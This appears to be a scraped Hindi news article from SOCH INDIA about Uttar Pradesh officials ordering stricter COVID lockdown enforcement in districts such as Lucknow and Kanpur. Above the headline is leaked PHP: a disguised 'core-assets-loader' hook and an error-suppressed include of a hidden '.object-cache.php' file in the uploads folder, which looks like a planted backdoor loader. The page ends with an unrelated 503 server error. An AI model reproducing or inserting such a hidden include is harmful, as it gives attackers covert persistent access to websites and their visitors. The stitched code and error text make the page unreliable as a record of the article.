add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); UP के कई जिलों में लॉकडाउन निष्प्रभावी होने से CM योगी नाराज, DGP ने पुलिस कप्तानों को जारी किए निर्देश – SOCH INDIA
Menu

देश
UP के कई जिलों में लॉकडाउन निष्प्रभावी होने से CM योगी नाराज, DGP ने पुलिस कप्तानों को जारी किए निर्देश

nobanner

उत्‍तर प्रदेश में कोरोना वायरस से निपटने के लिए योगी आदित्यनाथ सरकार अपना पूरा दमखम लगा रही है. लेकिन कई स्थानों पर लोगों का अपेक्षित सहयोग नहीं मिलने से इस महामारी के खिलाफ लड़ाई के कमजोर होने का भी डर है. सीएम योगी ने भी कई जिलों में लॉकडाउन को प्रभावी तरीके से लागू नहीं किए जाने पर नाराजगी जताई है. उत्तर प्रदेश के अपर मुख्‍य सचिव अवनीश अवस्‍थी ने एक पत्र जारी कर राज्य के कई जिलों में लॉकडाउन की स्थिति पर असंतोष जताया है. इन जिलों में लोगों द्वारा लॉकडाउन का पालन कठोरता के साथ नहीं किया जा रहा है.

योगी सरकार की ओर से संबंधित जिला प्रशासन को पत्र जारी कर कहा गया है कि वे लॉकडाउन का कठोरता से पालन कराने हेतु प्रभावी कार्रवाई सुनिश्चित करे. योगी सरकार ने लॉकडाउन को लेकर असंतोषजनक जिलों में पुलिस प्रशासन स्तर पर सुधार की जरूरत बताई है. अपर मुख्‍य सचिव अवनीश अवस्‍थी की ओर से जारी किए गए इस पत्र के बाद डीजीपी हितेश चन्द्र अवस्थी एक्शन में आ गए हैं. उन्होंने संबंधित जिलों के पुलिस प्रमुखों से लॉकडाउन का सख्ती से पालन कराए जाने के निर्देश दिए हैं.

जिन जिलों में लॉकडाउन के पालन में सख्ती की जरूरत बताई गई है उनमें लखनऊ, कानपुर, गोरखपुर, आगरा, बस्ती, उन्नाव, कन्नौज, संतकबीरनगर, मैनपुरी शामिल हैं. डीजीपी ने संबंधित जिलों के पुलिस कप्तानों को सभी हॉट स्पॉट क्षेत्रों में लोगों के आने-जाने पर पूरी तरह प्रतिबंध लगाने के निर्देश दिए हैं. साथ ही स्वास्थ्य विभाग और दमकल कर्मियों के सहयोग से इन क्षेत्रों को सैनिटाइज कराने के लिए कहा है. सभी जिलों के चिन्हित हॉट स्पॉट इलाकों में मजिस्ट्रेट के साथ पुलिस को फुट पेट्रोलिंग के निर्देश गए हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.